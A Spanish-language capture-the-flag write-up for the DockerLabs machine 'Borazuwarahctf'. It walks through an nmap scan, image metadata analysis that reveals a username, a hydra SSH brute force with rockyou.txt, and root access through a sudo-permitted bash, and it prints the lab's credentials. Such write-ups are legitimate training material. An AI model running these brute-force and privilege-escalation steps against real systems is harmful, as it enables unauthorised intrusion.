maciferna
  • 🖥️Whoami
  • 📚Writeups
    • BugBountyLabs
      • Corsy
    • DockerLabs
      • 0xc0ffee
      • 404-Not-Found
      • Allien
      • Anonymouspingu
      • Apolos
      • Asucar
      • Backend
      • BadPlugin
      • Balulero
      • Borazuwarahctf
      • Bruteshock
      • Buffered
      • Candy
      • Chmod-4755
      • Corruptress
      • Cracker
      • Crackoff
      • Dance-Samba
      • Darkweb
      • Debugme
      • Devil
      • Devtools
      • Eclipse
      • Express
      • File
      • Findyourstyle
      • Flow
      • Forgotten_Portal
      • Gallery
      • Hackmedaddy
      • Hidden
      • Inj3ct0rss
      • Injection
      • Insanity
      • Jenkhack
      • Lfi.elf
      • Life Or Dead
      • Mapache2
      • Master
      • Machupichu
      • Mirame
      • Paradise
      • Patria Querida
      • PingPong
      • Pntopntobarra
      • Pressenter
      • Raas
      • Report
      • Reverse
      • Rubiks
      • R00tless
      • Seeker
      • Sender
      • Showtime
      • Sites
      • Smashing
      • Spain
      • Stack
      • Stellarjwt
      • Stranger
      • SubVersion
      • The Dog
      • UserSearch
      • Vulnvault
      • Vulnerame
      • Wallet
      • Winterfell
    • HackMyVM
      • Hero
      • MagiFi
    • HackTheBox
      • Puppy
    • The Hackers Labs
      • Casa Paco
      • Shadow Gate
      • Token Of Hate
    • Vulnyx
      • Lost Tape
Con tecnología de GitBook
En esta página
  • RECONOCIMIENTO
  • INTRUSION
  • ESCALADA DE PRIVILEGIOS
  1. Writeups
  2. DockerLabs

Borazuwarahctf

AnteriorBaluleroSiguienteBruteshock

Última actualización hace 5 meses

Maquina borazuwarahctf de DockerLabs

Dificultad: Muy Fácil

Autor: BorazuwarahCTF

RECONOCIMIENTO

Comenzamos con un escaneo de nmap:

nmap -sVC 172.17.0.2
Nmap scan report for 172.17.0.2
Host is up (0.00054s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey: 
|   256 3d:fd:d7:c8:17:97:f5:12:b1:f5:11:7d:af:88:06:fe (ECDSA)
|_  256 43:b3:ba:a9:32:c9:01:43:ee:62:d0:11:12:1d:5d:17 (ED25519)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.59 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.00 seconds

No vemos nada interesante por lo que continuaremos desde el navegador. Al entrar se ve una imagen de un huevo kinder y al hacer un poco de fuzzing no encontramos nada, por lo que sospecho que trata de Esteganografía, lo que significa que puede haber archivos escondidos dentro de la imagen. Para hacerlo nos descargamos la imagen y ejecutamos el siguiente comando:

steghide extract -sf imagen.jpeg

nos pide un salvoconducto pero como no lo tenemos le damos al enter y nos extrae un archivo llamado "secret.txt", lo leemos y nos dice que no esta ahi la solución pero si esta en la imagen, sabiendo esto podemos usar exiftool, para hacerlo ejecutamos:

exiftool imagen.jpeg
ExifTool Version Number         : 12.57
File Name                       : imagen.jpeg
Directory                       : .
File Size                       : 19 kB
File Modification Date/Time     : 2024:08:19 15:39:19-03:00
File Access Date/Time           : 2024:08:19 15:39:19-03:00
File Inode Change Date/Time     : 2024:08:19 15:39:37-03:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
XMP Toolkit                     : Image::ExifTool 12.76
Description                     : ---------- User: borazuwarah ----------
Title                           : ---------- Password:  ----------
Image Width                     : 455
Image Height                    : 455
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 455x455
Megapixels                      : 0.207

Como vemos, ahora si encontramos la solucion pero a medias, ya que nos da un usuario llamado "borazuwarah" pero no la contraseña, por lo que recurriremos a usar hydra, para hacerlo ejecutamos el siguiente comando:

hydra -l borazuwarah -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2
[22][ssh] host: 172.17.0.2   login: borazuwarah   password: 123456

Como vemos, nos encuentra la contraseña para el usuario "borazuwarah" que es "123456".

INTRUSION

Ahora simplemente nos conectamos al ssh con:

ssh borazuwarah@172.17.0.2

y ponemos la contraseña.

Ya estamos dentro.

ESCALADA DE PRIVILEGIOS

Ejecutamos sudo -l para ver si podemos ejecutar algo como root, y vemos que el binario bash si se puede, por lo que simplemente ponemos:

 sudo /bin/bash -p

Y listo, SOMOS ROOT.

Gracias por leer.

📚
Dock
root